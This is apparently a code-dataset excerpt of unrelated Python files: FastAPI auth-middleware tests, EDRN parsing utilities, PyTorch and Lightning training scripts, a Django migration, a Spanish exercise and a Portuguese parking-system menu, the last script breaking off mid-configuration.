content
stringlengths 5
1.05M
|
|---|
"""Auth middleware tests."""
import asyncio
from typing import Any
from typing import Dict
from typing import Optional
from typing import Union
from unittest import mock
from unittest.mock import MagicMock
import pytest
from fastapi import FastAPI
from orjson import dumps # pylint: disable-msg=E0611
from starlette.requests import Request
from starlette.responses import Response
from truth.truth import AssertThat # type: ignore
from app.services.auth.base import create_tokens
from app.services.auth.middleware import TokenAuthMiddleware
from app.utils.exceptions import UnauthorizedError
from tests.test_services.test_auth.test_base import USER_UUID
def request_factory(token: Optional[Any] = None) -> Request:
"""Create test request."""
request_scope: Dict[str, Any] = {
"type": "http",
"method": "GET",
"headers": [],
}
if token is not None:
request_scope["headers"] = [
(b"authorization", f"Bearer {token}".encode("utf-8"),)
]
request: Request = Request(scope=request_scope)
return request
async def call_next(request: Request) -> Response: # pylint: disable=unused-argument
"""Mock call next method which will be called in middleware."""
return Response(status_code=200, content=b"test_call_next")
@pytest.mark.asyncio
async def test_auth_middleware_not_authorization() -> None:
"""Check auth middleware if Authorization header is not provided."""
middleware = TokenAuthMiddleware(app=FastAPI())
request: Request = request_factory()
response: Response = await middleware.dispatch(request=request, call_next=call_next)
call_next_response: Response = await call_next(request=request)
AssertThat(response.body).IsEqualTo(call_next_response.body)
@pytest.mark.asyncio
async def test_auth_middleware_not_token_in_header() -> None:
"""Check auth middleware if token not provided in header."""
middleware = TokenAuthMiddleware(app=FastAPI())
request: Request = request_factory(token="")
response: Response = await middleware.dispatch(request=request, call_next=call_next)
call_next_response: Response = await call_next(request=request)
AssertThat(response.body).IsEqualTo(call_next_response.body)
@pytest.mark.asyncio
async def test_auth_middleware_invalid_token() -> None:
"""Check auth middleware if token is not valid."""
middleware = TokenAuthMiddleware(app=FastAPI())
request: Request = request_factory(token="invalid")
response: Response = await middleware.dispatch(request=request, call_next=call_next)
AssertThat(response.status_code).IsEqualTo(UnauthorizedError.status_code)
@pytest.mark.asyncio
@mock.patch("app.extensions.redis_client.set")
@mock.patch("app.extensions.redis_client.get")
async def test_auth_middleware_raw_data_is_none(
get_mock: MagicMock,
set_mock: MagicMock,
) -> None:
"""Check auth middleware if tokens raw data from redis is None."""
get_mock.return_value = asyncio.Future()
get_mock.return_value.set_result(None)
set_mock.return_value = asyncio.Future()
set_mock.return_value.set_result(None)
middleware = TokenAuthMiddleware(app=FastAPI())
tokens: Dict[str, Union[str, int]] = await create_tokens(user_id=str(USER_UUID))
request: Request = request_factory(token=tokens["access_token"])
response: Response = await middleware.dispatch(request=request, call_next=call_next)
AssertThat(response.status_code).IsEqualTo(UnauthorizedError.status_code)
get_mock.assert_called_once_with(tokens["access_token"])
@pytest.mark.asyncio
@mock.patch("app.extensions.redis_client.set")
@mock.patch("app.extensions.redis_client.get")
async def test_auth_middleware(
get_mock: MagicMock,
set_mock: MagicMock,
) -> None:
"""Check auth middleware if everything is fine."""
get_mock.return_value = asyncio.Future()
get_mock.return_value.set_result(dumps({"user_id": str(USER_UUID), "test": "test"}))
set_mock.return_value = asyncio.Future()
set_mock.return_value.set_result(None)
tokens: Dict[str, Union[str, int]] = await create_tokens(user_id=str(USER_UUID))
middleware = TokenAuthMiddleware(app=FastAPI())
request: Request = request_factory(token=tokens["access_token"])
response: Response = await middleware.dispatch(request=request, call_next=call_next)
call_next_response: Response = await call_next(request=request)
get_mock.assert_called_once_with(tokens["access_token"])
AssertThat(response.body).IsEqualTo(call_next_response.body)
|
# encoding: utf-8
# Copyright 2008—2012 California Institute of Technology. ALL RIGHTS
# RESERVED. U.S. Government Sponsorship acknowledged.
'''
EDRN Summarizer Service: utilities.
'''
import urllib.parse, re
# Why, why, why? DMCC, you so stupid!
# @yuliujpl: why is this even here?
DEFAULT_VERIFICATION_NUM = '0' * 40960
# URL schemes we consider "accessible"
# @yuliujpl: and this?
ACCESSIBLE_SCHEMES = frozenset((
'file',
'ftp',
'gopher',
'http',
'https',
'ldap',
'ldaps',
'news',
'nntp',
'prospero',
'telnet',
'wais',
'testscheme', # Used during testing.
))
# DMCC no longer separates rows by '!!'. Yay.
# @yuliujpl: and this?
_rowSep = re.compile(r'<recordNumber>[0-9]+</recordNumber><numberOfRecords>[0-9]+</numberOfRecords>'
r'<ontologyVersion>[0-9.]+</ontologyVersion>')
# @yuliujpl: and this?
def splitDMCCRows(horribleString):
'''Split a horrible DMCC string into rows. Returns an iterable.'''
i = _rowSep.split(horribleString)
i = i[1:] # Skip first item, which is the empty string to the left of the first row separator
return i
# converts csv file into dictionary, colkey and colvay determines which column
# is key and which column is value in the dictionary
# @yuliujpl: in the absence of coding standards, it's poite to adopt the style already in the file
# and not inject your own.
def csvToDict(file, colkey, colval):
dict = {}
with open(file) as f:
for line in f:
line_split = line.split(",")
if line_split[colkey].strip() not in list(dict.keys()):
dict[line_split[colkey].strip()] = []
dict[line_split[colkey].strip()].append(line_split[colval].strip())
# f.close() @yuliujpl: you don't need to close because you wrapped it in ``with``
return dict
_biomutaRowSep = re.compile(',')
def splitBiomutaRows(horribleString):
'''Split a horrible Biomuta string into rows. Returns an iterable.'''
i = _biomutaRowSep.split(horribleString)
return i
# @yuliujpl: and this?
def validateAccessibleURL(s):
'''Ensure the unicode string ``s`` is a valid URL and one whose scheme we deem "accessible".
"Accessible" means that we reasonably expect our network APIs to handle locally- or network-
retrieval resources.
'''
parts = urllib.parse.urlparse(s)
return parts.scheme in ACCESSIBLE_SCHEMES
# @yuliujpl: and this?
START_TAG = re.compile(r'^<([-_A-Za-z0-9]+)>') # <Key>, saving "Key"
# @yuliujpl: and this?
def parseTokens(s):
'''Parse DMCC-style tokenized key-value pairs in the string ``s``.'''
if not isinstance(s, str): raise TypeError('Token parsing works on strings only')
s = s.strip()
while len(s) > 0:
match = START_TAG.match(s)
if not match: raise ValueError('Missing start element')
key = match.group(1)
s = s[match.end():]
match = re.match(r'^(.*)</' + key + '>', s, re.DOTALL)
if not match: raise ValueError('Unterminated <%s> element' % key)
value = match.group(1)
s = s[match.end():].lstrip()
yield key, value
|
import torch
import torch.nn as nn
import src.run_utils as ru
from src.run_utils import create_directory, set_seed
from src.models import load_model
from src.loss import LossFunctions
from src.training import training
from src.configure import params_from_file, print_congiguration
def main():
""" Main method to execute the NN training. """
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
print('Running on', device)
paths = params_from_file('paths')
training_params = params_from_file('training_params')
hparams = params_from_file('hparams')
ru.create_directory(paths.tensorboard_path)
hparam_runs = ru.get_hparam_runs(training_params, hparams)
print_congiguration(hparam_runs)
for counter, hparam in enumerate(hparam_runs):
print(f"Run {counter+1}/{len(hparam_runs)} ")
model = load_model(training_params, hparam, device=device)
if torch.cuda.device_count() > 1:
print("Using", torch.cuda.device_count(), "GPUs")
model = nn.DataParallel(model)
losses = LossFunctions(hparam, device=device)
cost = getattr(losses, training_params.loss_function)
optimizer = torch.optim.Adam(model.parameters(),
lr=10**(float(-hparam.lr)),
weight_decay=hparam.weight_decay)
training(training_params, model, cost, optimizer, device, hparam, paths)
print('Training finished.')
if __name__ == "__main__":
set_seed()
main()
|
# Generated by Django 2.0.3 on 2018-03-17 06:58
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('documents', '0003_userclient_slug'),
]
operations = [
migrations.AddField(
model_name='folderclient',
name='slug',
field=models.SlugField(
blank=True,
null=True,
unique=True,
verbose_name='Slug'),
),
]
|
"""P6E4 VICTORIA PEÑAS
Escribe un programa que te pida dos números, de manera que el segundo
sea mayor que el primero. El programa termina escribiendo los dos
números tal y como se pide:"""
num1=int(input("Escribe un número: "))
num2=int(input(f"Escribe un número mayor que {num1}: "))
while num1>=num2:
num2=int(input(f"{num2} no es mayor que {num1}. Vuelve \
a introducir un número: "))
print(f"Los números que has escrito son {num1} y {num2}")
|
from usuario import Usuario
from interacao import Interacao
from veiculo import Veiculo
from eventos import Eventos
from ocorrencias import Ocorrencias
from areasEspeciais import AreasEspeciais
def main():
print('Bem vindo ao MoraisParking!')
#Criação dos objetos
usuario = Usuario()
interacao = Interacao()
veiculo = Veiculo()
evento = Eventos()
ocorrencia = Ocorrencias()
areasE = AreasEspeciais()
print(interacao.getInteracao())
entrada = int(input("Digite: "))
#Caso seja digitada alguma opção inválida
while entrada > 2:
print("Opção invalida. Tente novamente!")
print(interacao.getInteracao())
entrada = int(input("Digite: "))
#Tela de iniciação para fazer login
while entrada < 3:
if entrada == 1:
print("\nRealizar Login")
print("1 - Funcionário\n2 - RH\n3 - Gestor")
x = int(input("Digite: "))
#Realizar login
if x == 1:
print("\nTela de Login Funcionário")
nome = input("Nome: ")
senha = input("Senha: ")
cargo = "funcionário"
#Verificação se existe usuário ou não
validacao = usuario.verificarUsuario(nome,senha,cargo)
#Caso a validação dê errado
while validacao == False:
print("\nUsuário ou senha Inválidos!\nTente Novamente.\n")
nome = input("Nome: ")
senha = input("Senha: ")
cargo = "funcionário"
validacao = usuario.verificarUsuario(nome,senha,cargo)
elif x == 2:
print("\nTela de Login RH")
nome = input("Nome: ")
senha = input("Senha: ")
cargo = "RH"
#Verificação se existe usuário ou não
validacao = usuario.verificarUsuario(nome,senha,cargo)
#Caso a validação dê errado
while validacao == False:
print("\nUsuário ou senha Inválidos!\nTente Novamente.\n")
nome = input("Nome: ")
senha = input("Senha: ")
cargo = "RH"
validacao = usuario.verificarUsuario(nome,senha,cargo)
if x == 3:
print("\nTela de Login Gestor")
nome = input("Nome: ")
senha = input("Senha: ")
cargo = "gestor"
#Verificação se existe usuário ou não
validacao = usuario.verificarUsuario(nome,senha,cargo)
#Caso a validação dê errado
while validacao == False:
print("\nUsuário ou senha Inválidos!\nTente Novamente.\n")
nome = input("Nome: ")
senha = input("Senha: ")
cargo = "gestor"
validacao = usuario.verificarUsuario(nome,senha,cargo)
#Caso a validação dê certo para funcionário
if (validacao == True and x == 1):
print("\nMenu do Funcionário")
print(interacao.getInteracao2())
entradaI2 = int(input("Digite: "))
#Loop da interação
while entradaI2 < 9:
#Interação de cadastrar veículos
if entradaI2 == 1:
print("\nTela de cadastro de veículos")
matricula = input('Insira uma matricula: ')
nome = input('Insira um nome: ')
placa = input('Insira um placa: ')
marca = input('Insira um marca: ')
tipo = input('Insira um tipo: ')
print("\n"+interacao.getInteracao4())
bloco = int(input("Digite: "))
veiculo.cadastrarVeiculo(matricula,nome,placa,marca,tipo,bloco)
print("\nVeículo cadastrado com sucesso!")
print("O que mais deseja fazer?")
#Interação de identificar veículos
elif entradaI2 == 2:
print("\nTela de Identificação do Veículos")
placa = input('Digite a placa do veiculo: ')
#Só identifica os veículos ausentes
status = "Ausente"
#verificação se existe ou não o veículos
if veiculo.pesquisarVeiculo(placa,status):
print("\nEstacionar " + interacao.getInteracao4())
bloco = int(input("Digite o bloco para o veículo estacionar: "))
print(veiculo.inserirEstaciomanento(bloco,placa))
#caso não exista, solicitar o cadastro do mesmo
else:
#se quer cadastrar ou não
rs = input("Deseja cadastrar o Veículo (S/N)?: ")
if rs == 'S' or rs == 's':
print("\nCadastre o Veículo\n")
matricula = input('Insira um matricula: ')
nome = input('Insira um nome: ')
placa = input('Insira um placa: ')
marca = input('Insira um marca: ')
tipo = input('Insira um tipo: ')
data = input('Insira um data: ')
hora = input('Insira um hora: ')
bloco = input('Insira um bloco: ')
veiculo.cadastrarVeiculo(matricula,nome,placa,marca,tipo,data,hora,bloco)
print("Veículo cadastrado com sucesso!")
print("O que mais deseja fazer?")
#se não quiser cadastrar, o sistema não faz nada
else:
print()
#Interação de remoção de veículos
elif entradaI2 == 3:
print("\nTela de remoção de veículo")
placa = input('Digite a placa do veiculo: ')
status = "Presente"
#verifica se existe veículo
teste = veiculo.pesquisarVeiculo(placa,status)
if teste == True:
#se existir pergunta se realmente quer remover
rs = input('Deseja realmente remover o veículo? (S/N): ')
if rs == 'S' or rs == 's':
print(veiculo.removerVeiculo(placa))
#se não existir, retorna mensagem de erro
else:
print("Veículo não encontrado!")
#Interação de cadastro de eventos
elif entradaI2 == 4:
print("\nCadastro de Eventos")
nome = str(input('Nome: '))
inicio = str(input('Data Inicio (dd/MM/yyyy): '))
fim = str(input('Data Fim (dd/MM/yyyy): '))
print("\n"+interacao.getInteracao4())
local = int(input("Digite: "))
vagas = str(input('QNT Vagas: '))
evento.cadastrarEventos(nome,inicio,fim,local,vagas)
print("\nEvento cadastrado com sucesso!")
print("O que mais deseja fazer?")
#Interação de cadastro de ocorrências
elif entradaI2 == 5:
print("\nCadastro de Ocorrências")
placa = str(input("Placa: "))
matricula = str(input("Matricula: "))
nome = str(input("Nome: "))
marca = str(input("Marca: "))
tipo = str(input("Tipo: "))
#chama a interação dos tipos de ocorrências
print(interacao.getInteracaoOcorrencias())
tipoOcorrencia = int(input("Ocorrencia: "))
data = str(input("Data (dd/MM/yyyy): "))
print("\n"+interacao.getInteracao4())
local = int(input("Digite: "))
ocorrencia.cadastrarOcorrencia(placa,matricula,nome,marca,tipo,tipoOcorrencia,data,local)
print("\nOcorrência cadastrada com sucesso!")
print("O que mais deseja fazer?")
#Interação de monitoramento do estacionamento
elif entradaI2 == 6:
print("\nDigite uma das opções!")
print("1 - Ausentes")
print("2 - Presentes")
x = int(input("Digite: "))
#Caso a escolha for ausente
if x == 1:
print("\nDigite uma das opções!")
print("1 - Por Blocos")
print("2 - Por Data")
c = int(input("Digite: "))
#Caso a escolha for por bloco
if c == 1:
print(interacao.getInteracao3())
valor = int(input("Digite: "))
print("\nTela de Monitoramento")
print(veiculo.monitoramentoVeiculos(valor,"Ausente"))
print("Total de vagas da respectiva área")
#Definições das vagas do estacionamento
print("| Total: "+str(veiculo.getTotalVagas())+ " | Total Disponível: " \
+ str(veiculo.getVagasDisponiveis())+ " | Vagas Preenchidas: " \
+ str(veiculo.getVagasPreenchidas()) +" |")
#Caso a escolha for por data
elif c == 2:
data = input("Digite uma data (dd/MM/yyyy): ")
print("\nTela de Monitoramento")
print(veiculo.pesquisarVeiculoPorData(data,"Ausente"))
print("Total de vagas da respectiva área")
#Definições das vagas do estacionamento
print("| Total: "+str(veiculo.getTotalVagas())+ " | Total Disponível: " \
+ str(veiculo.getVagasDisponiveis()) + " | Vagas Preenchidas: " \
+ str(veiculo.getVagasPreenchidas()) +" |")
#Caso a escolha for presente
elif x == 2:
print("\nDigite uma das opções!")
print("1 - Por Blocos")
print("2 - Por Data")
c = int(input("Digite: "))
#Caso a escolha for por bloco
if c == 1:
print(interacao.getInteracao3())
valor = int(input("Digite: "))
print("\nTela de Monitoramento")
print(veiculo.monitoramentoVeiculos(valor,"Presente"))
print("Total de vagas da respectiva área")
#Definições das vagas do estacionamento
print("| Total: "+str(veiculo.getTotalVagas())+ " | Total Disponível: " \
+ str(veiculo.getVagasDisponiveis()- evento.totalDeVagasPorBloco(valor) - areasE.qntDeVagasPorBloco(valor)) + " | Vagas Preenchidas: " \
+ str(veiculo.getVagasPreenchidas() + evento.totalDeVagasPorBloco(valor) + areasE.qntDeVagasPorBloco(valor)) +\
" | Vagas reservadas para Eventos: " + str(evento.totalDeVagasPorBloco(valor)) + \
" | Vagas de Áreas Especiais: " + str(areasE.qntDeVagasPorBloco(valor))+" |")
#Caso a escolha for por data
elif c == 2:
data = input("Digite uma data (dd/MM/yyyy): ")
print("\nTela de Monitoramento")
print(veiculo.pesquisarVeiculoPorData(data,"Presente"))
print("Total de vagas da respectiva área")
#Definições das vagas do estacionamento
print("| Total: "+str(veiculo.getTotalVagas())+ " | Total Disponível: " \
+ str(veiculo.getVagasDisponiveis()) + " | Vagas Preenchidas: " \
+ str(veiculo.getVagasPreenchidas()) +" |")
#Interação de monitoramento de eventos
elif entradaI2 == 7:
print(interacao.getInteracao3())
valor = int(input("Digite: "))
print("\nTela de Monitoramento")
print(evento.monitorarEventos(valor))
#Interação de monitoramento de ocorrências
elif entradaI2 == 8:
print(interacao.getInteracao3())
valor = int(input("Digite: "))
print("\nTela de Monitoramento")
print(ocorrencia.monitorarOcorrencia(valor))
#encerrar o sistema direto sem deslogar
elif entradaI2 == 0:
print('Volte quando quiser! =)')
exit()
print("\nMenu do Funcionário")
print(interacao.getInteracao2())
entradaI2 = int(input("Digite: "))
if entradaI2 == 100:
print("Usuário deslogado!")
#Caso a validação dê certo para RH
elif (validacao == True and x == 2):
print("\nMenu do RH")
print(interacao.getInteracaoRH())
entrada = int(input("Digite: "))
while entrada != 100:
#Cadastrar um funcionário
if entrada == 1:
print("\nCadastre um Funcionário")
nome = input("Nome: ")
senha = input("Senha: ")
cargo = ""
print("1 - Funcionário\n2 - RH\n3 - Gestor")
x = int(input("Digite: "))
if x == 1:
cargo = "funcionário"
elif x == 2:
cargo = "RH"
elif x == 3:
cargo = "gestor"
usuario.cadastrar(nome, senha,cargo)
print("\nCadastro realizado com sucesso!")
print('O que mais deseja fazer?')
#Dar permissão a uma áres especial
elif entrada == 2:
print("\nDar Permissão "+interacao.getInteracao4())
valor = int(input("Digite: "))
status = "Ativa"
print(areasE.monitoramentoAreasEspeciaisPorBloco(valor, status))
#Verificar se existe área especial naquele bloco
if areasE.verificarAreaEspecial(valor):
id = input("\nDigite a ID da Área Especial: ")
print(interacao.getInteracaoAcesso())
acesso = int(input("Quem terá acesso? "))
print(areasE.darPermissao(id,acesso))
else:
print("Não existe Área Especial cadastrada nesse bloco")
print("\nMenu do RH")
print(interacao.getInteracaoRH())
entrada = int(input("Digite: "))
if entrada == 100:
print("Usuário deslogado!")
#Caso a validação dê certo para GEstor
elif (validacao == True and x == 3):
print("\nMenu do Gestor")
print(interacao.getInteracaoGestor())
entradaI2 = int(input("Digite: "))
#Cadastrar áreas especiais
while entradaI2 < 10:
if entradaI2 == 1:
print("\nCadatrar " + interacao.getInteracao4())
bloco = int(input("Bloco: "))
print("\nQuem terá acesso?")
#Interação dos envolvidos que podem ter acessos
print(interacao.getInteracaoAcesso())
acesso = int(input("Acesso: "))
inicio = input("Inicio (dd/MM/yyyy): ")
fim = input("Fim (dd/MM/yyyy): ")
vagas = input("Vagas: ")
areasE.cadastrarAreaEspecial(bloco,acesso,inicio,fim,vagas)
print('\nArea Especial cadastrada com sucesso!')
print('O que mais deseja fazer?')
#Monitoramento do Estacionamento
elif entradaI2 == 2:
print("\nDigite uma das opções!")
print("1 - Ausentes")
print("2 - Presentes")
x = int(input("Digite: "))
#Caso a escolha for ausente
if x == 1:
print("\nDigite uma das opções!")
print("1 - Por Blocos")
print("2 - Por Data")
c = int(input("Digite: "))
#Caso a escolha for por bloco
if c == 1:
print(interacao.getInteracao3())
valor = int(input("Digite: "))
print("\nTela de Monitoramento")
print(veiculo.monitoramentoVeiculos(valor,"Ausente"))
print("Total de vagas da respectiva área")
#Definições das vagas do estacionamento
print("| Total: "+str(veiculo.getTotalVagas())+ " | Total Disponível: " \
+ str(veiculo.getVagasDisponiveis())+ " | Vagas Preenchidas: " \
+ str(veiculo.getVagasPreenchidas()) +" |")
#Caso a escolha for por data
elif c == 2:
data = input("Digite uma data (dd/MM/yyyy): ")
print("\nTela de Monitoramento")
print(veiculo.pesquisarVeiculoPorData(data,"Ausente"))
print("Total de vagas da respectiva área")
#Definições das vagas do estacionamento
print("| Total: "+str(veiculo.getTotalVagas())+ " | Total Disponível: " \
+ str(veiculo.getVagasDisponiveis()) + " | Vagas Preenchidas: " \
+ str(veiculo.getVagasPreenchidas()) +" |")
#Caso a escolha for presente
elif x == 2:
print("\nDigite uma das opções!")
print("1 - Por Blocos")
print("2 - Por Data")
c = int(input("Digite: "))
#Caso a escolha for por bloco
if c == 1:
print(interacao.getInteracao3())
valor = int(input("Digite: "))
print("\nTela de Monitoramento")
print(veiculo.monitoramentoVeiculos(valor,"Presente"))
print("Total de vagas da respectiva área")
#Definições das vagas do estacionamento
print("| Total: "+str(veiculo.getTotalVagas())+ " | Total Disponível: " \
+ str(veiculo.getVagasDisponiveis()- evento.totalDeVagasPorBloco(valor) - areasE.qntDeVagasPorBloco(valor)) + " | Vagas Preenchidas: " \
+ str(veiculo.getVagasPreenchidas() + evento.totalDeVagasPorBloco(valor) + areasE.qntDeVagasPorBloco(valor)) +\
" | Vagas reservadas para Eventos: " + str(evento.totalDeVagasPorBloco(valor)) + \
" | Vagas de Áreas Especiais: " + str(areasE.qntDeVagasPorBloco(valor))+" |")
#Caso a escolha for por data
elif c == 2:
data = input("Digite uma data (dd/MM/yyyy): ")
print("\nTela de Monitoramento")
print(veiculo.pesquisarVeiculoPorData(data,"Presente"))
print("Total de vagas da respectiva área")
#Definições das vagas do estacionamento
print("| Total: "+str(veiculo.getTotalVagas())+ " | Total Disponível: " \
+ str(veiculo.getVagasDisponiveis()) + " | Vagas Preenchidas: " \
+ str(veiculo.getVagasPreenchidas()) +" |")
#Monitoramento de Eventos
elif entradaI2 == 3:
print(interacao.getInteracao3())
valor = int(input("Digite: "))
print("\nTela de Monitoramento\n")
print(evento.monitorarEventos(valor))
#Monitoramento de Ocorrências
elif entradaI2 == 4:
print(interacao.getInteracao3())
valor = int(input("Digite: "))
print("\nTela de Monitoramento\n")
print(ocorrencia.monitorarOcorrencia(valor))
#Monitoramento de Áreas Especiais
elif entradaI2 == 5:
print(interacao.getInteracao3())
valor = int(input("Digite: "))
status = 'Ativa'
print("\nTela de Monitoramento\n")
print(areasE.monitoramentoAreasEspeciaisPorBloco(valor,status))
#Remover Áreas Especiais
elif entradaI2 == 6:
#Primeiro mostra as áreas que existem
print(areasE.monitoramentoAreasEspeciaisPorBloco(0,"Ativa"))
print()
id = input("Digite a ID da Área Especial que deseja remover: ")
#Depois exclui a área escolhida
print(areasE.removerAreaEspecial(id))
print('O que mais deseja fazer?')
#Cadastrar Eventos
elif entradaI2 == 7:
print("\nCadastro de Eventos")
nome = str(input('Nome: '))
inicio = str(input('Data Inicio (dd/MM/yyyy): '))
fim = str(input('Data Fim (dd/MM/yyyy): '))
print("\n"+interacao.getInteracao4())
local = int(input("Digite: "))
vagas = str(input('QNT Vagas: '))
evento.cadastrarEventos(nome,inicio,fim,local,vagas)
print("\nEvento cadastrado com sucesso!")
print("O que mais deseja fazer?")
#Dar permissão as áreas especiais
elif entradaI2 == 8:
print("\nDar Permissão "+interacao.getInteracao4())
valor = int(input("Digite: "))
status = "Ativa"
print(areasE.monitoramentoAreasEspeciaisPorBloco(valor, status))
#Verifica se existe área no bloco escolhido
if areasE.verificarAreaEspecial(valor):
id = input("\nDigite a ID da Área Especial: ")
print(interacao.getInteracaoAcesso())
acesso = int(input("Quem terá acesso? "))
print(areasE.darPermissao(id,acesso))
else:
print("Não existe Área Especial cadastrada nesse bloco")
elif entradaI2 == 9:
print("\nTela de extração de Relatórios")
print("Extrair relatório\n" + interacao.getInteracaoRelatorios())
x = int(input("Digite: "))
if x == 1:
veiculo.gerarRelatorio()
print("\nRelatório extraído com sucesso!")
elif x == 2:
evento.gerarRelatorio()
print("\nRelatório extraído com sucesso!")
elif x == 3:
ocorrencia.gerarRelatorio()
print("\nRelatório extraído com sucesso!")
elif x == 4:
areasE.gerarRelatorio()
print("\nRelatório extraído com sucesso!")
#Encerra o sistema direto
elif entradaI2 == 0:
print('Volte quando quiser! =)')
exit()
print("\nMenu do Gestor")
print(interacao.getInteracaoGestor())
entradaI2 = int(input("Digite: "))
#Desloga o usuário
if entradaI2 == 100:
print("Usuário deslogado!")
#Encerra o sistema direto
elif entrada == 0:
print('Volte quando quiser! =)')
exit()
print(interacao.getInteracao())
entrada = int(input("Digite: "))
main()
|
# coding=utf-8
# Copyleft 2019 project LXRT.
import sys
import traceback
import os
import json
import random
import collections
import shutil
import torch
import torch.nn as nn
from torch.utils.data.dataloader import DataLoader
import pytorch_lightning as pl
from pytorch_lightning.loggers import WandbLogger
from pytorch_lightning.plugins import DDPPlugin
from tqdm import tqdm
import numpy as np
import cv2
from detectron2.structures import BoxMode
import wandb
import utils
from param import args
from tasks.simmc2_coreference_data_pl import SIMMC2DataModule
from tasks.simmc2_coreference_model_pl import SIMMC2CoreferenceModelWithDescriptions
USE_MODEL_WITH_DESCRIPTIONS = True
SEEDS = np.arange(122, 300, 5)
DataTuple = collections.namedtuple("DataTuple", 'dataset loader evaluator')
wandb.login()
args.qa = False
class CustomModelCheckpoint(pl.callbacks.ModelCheckpoint):
def __init__(self, dirpath, filename):
self._token_to_replace = '$run_id$'
self.filename = filename
super().__init__(
monitor='val/object_f1',
dirpath=dirpath,
filename=self.filename,
save_last=True,
save_top_k=2,
mode='max',
every_n_epochs=1,
auto_insert_metric_name=False
)
def on_validation_end(self, trainer: pl.Trainer, pl_module):
"""
ModelCheckpoint hardcodes self.filename = '{epoch}' in its on_train_start().
But custom callbacks are called _before_ ModelCheckpoint, meaning setting it
in our on_train_start() would just get overwritten. Therefore, we set it here in
on_validation_end(), as checkpointing in Lightning is currently tied to
Validation performance.
https://github.com/PyTorchLightning/pytorch-lightning/issues/2042
"""
if self._token_to_replace in self.filename and trainer.global_rank == 0:
self.filename = self.filename.replace(
self._token_to_replace, str(trainer.logger.version))
super().on_validation_end(trainer, pl_module)
def get_model(batches_per_epoch=-1):
# create model class
if args.load:
print(f"Loading model from '{checkpoint_dir}/{args.load}'")
coreference_model = SIMMC2CoreferenceModelWithDescriptions.load_from_checkpoint(
f"{checkpoint_dir}/{args.load}", name=model_name,
max_seq_length=model_config['max_seq_length'], f=model_config['input_features'],
batches_per_epoch=batches_per_epoch, lr=args.lr, final_layer=args.final_layer,
ablation=args.ablation)
else:
coreference_model = SIMMC2CoreferenceModelWithDescriptions(
model_name, model_config['max_seq_length'], f=model_config['input_features'],
batches_per_epoch=batches_per_epoch, lr=args.lr, final_layer=args.final_layer,
ablation=args.ablation)
return coreference_model
def main_train():
# basic datamodule
data_module_train_test = SIMMC2DataModule.train_test_data_module(
args.batch_size, args.num_workers, model_config['max_seq_length'])
# data_module_train_test.setup()
# avoid duplicating data, so comment out this line
# batches_per_epoch = len(data_module_train_test.train_dataloader())
coreference_model = get_model(batches_per_epoch=9110)
trainer = pl.Trainer(**trainer_config)
trainer.fit(coreference_model, datamodule=data_module_train_test)
if coreference_model.global_rank == 0:
# only print once in main process
print(f"\nBest model saved at '{checkpoint_callback.best_model_path}'")
if log_with_wandb and checkpoint_callback.best_model_path:
# log final devtest results to wandb
wandb_run_id = coreference_model.logger.version
args.load = checkpoint_callback.best_model_path.split('/simmc2_533/')[-1]
# trainer_config['logger']
print()
coreference_model.logger.experiment.notes = f"Model saved as: '{args.load}'"
# a limitation of DDP is that we cannot run .fit and .test in the same script
# main_test(wandb_run_id)
print(f"To test this model in devtest, run: "
f"test \"--wandb_id {wandb_run_id} --load {args.load}\"\n\n")
def main_test(wandb_run_id: str = None):
trainer_config['gpus'] = 1 # do not test in more than 1 GPU to avoid some DDP issues
trainer_config['logger'] = WandbLogger(
name=model_name, project='exloring-mm-in-simmc2',
settings=wandb.Settings(_disable_stats=True), version=wandb_run_id) \
if log_with_wandb else True
# basic datamodule
data_module_train_test = SIMMC2DataModule.train_test_data_module(
args.batch_size, args.num_workers, model_config['max_seq_length'])
coreference_model = get_model()
trainer = pl.Trainer(**trainer_config)
test_results = trainer.test(
coreference_model,
datamodule=data_module_train_test)
print(test_results)
if log_with_wandb is not None:
if wandb_run_id is None:
wandb_run_id = coreference_model.logger.version
# log test results
print(f"Logging test results to {wandb_run_id}")
if len(test_results) > 1:
raise ValueError(
f"test_results is too long: len={len(test_results)}\ntest_results={test_results}")
# need to log into wandb: object f1, recall, precision and object f1 std, object similarity
for key, value in test_results[0].items():
# we only want to have 1 value for test at most
coreference_model.logger.experiment.summary[key] = value
# coreference_model.logger.experiment.summary.update()
def main_predict():
trainer_config['gpus'] = 1 # do not predict in more than 1 GPU to avoid some DDP issues
data_module = SIMMC2DataModule.empty_data_module(
args.batch_size, args.num_workers, model_config['max_seq_length'])
data_module.setup()
coreference_model = get_model()
trainer = pl.Trainer(**trainer_config)
# create prediction files for each dataset split
splits_to_predict = ['devtest'] # , 'teststd_public']
for split in splits_to_predict:
predictions = trainer.predict(
coreference_model,
dataloaders=data_module.custom_dataloader(split))
coreference_model.post_process_predictions(
predictions, f"snap/dstc10-simmc-{split}-pred-subtask-2.json",
extra={'load': args.load})
if __name__ == "__main__":
keys_to_print = ['load', 'output', 'num_runs', 'lr', 'dropout', 'llayers', 'xlayers', 'rlayers']
# 'train_data_ratio', 'simmc2_input_features', 'simmc2_max_turns']
_info = {k: getattr(args, k) for k in keys_to_print}
model_config = {
'batch_size': args.batch_size,
'dropout': args.dropout,
'epochs': args.epochs,
'learning_rate': args.lr,
# max_seq_length 50 is fine for lxr322 to lxr533
# max_seq_length 30 is fine for lxr744
# max_seq_length 25 is fine for lxr955
'max_seq_length': 50,
'random_seed': 123,
'image_feature_file': args.image_feature_file,
'image_categories': args.image_categories,
'pred_threshold': 0.35,
'input_features': args.simmc2_input_features
}
feature_str = '-'.join([f"{k}={v}" for k, v in args.simmc2_input_features.items()])
feature_str = feature_str.replace('True', 'T').replace('False', 'F')
if args.tiny:
feature_str += '-tiny'
model_name = f"{feature_str}-epochs={args.epochs}"
log_with_wandb = not ('WANDB_MODE' in os.environ and os.environ['WANDB_MODE'] == 'disabled')
if log_with_wandb and args.mode in ['train', 'test'] and not args.tiny:
logger = WandbLogger(
name=model_name, project='exloring-mm-in-simmc2',
settings=wandb.Settings(_disable_stats=True), version=args.wandb_id)
else:
logger = True
checkpoint_dir = f"{args.output}_{args.llayers}{args.xlayers}{args.rlayers}"
# instead of saving as val/object_f1, we do val@object_f1 to avoid creating folders due to the /
checkpoint_filename = 'coref-$run_id$-val@f1={val/object_f1:.3f}-' \
'step={step}-train@loss{train/loss:.3f}-' + feature_str
checkpoint_callback = CustomModelCheckpoint(checkpoint_dir, checkpoint_filename)
trainer_config = {
'max_epochs': args.epochs,
'gpus': 4 if not args.tiny else 1,
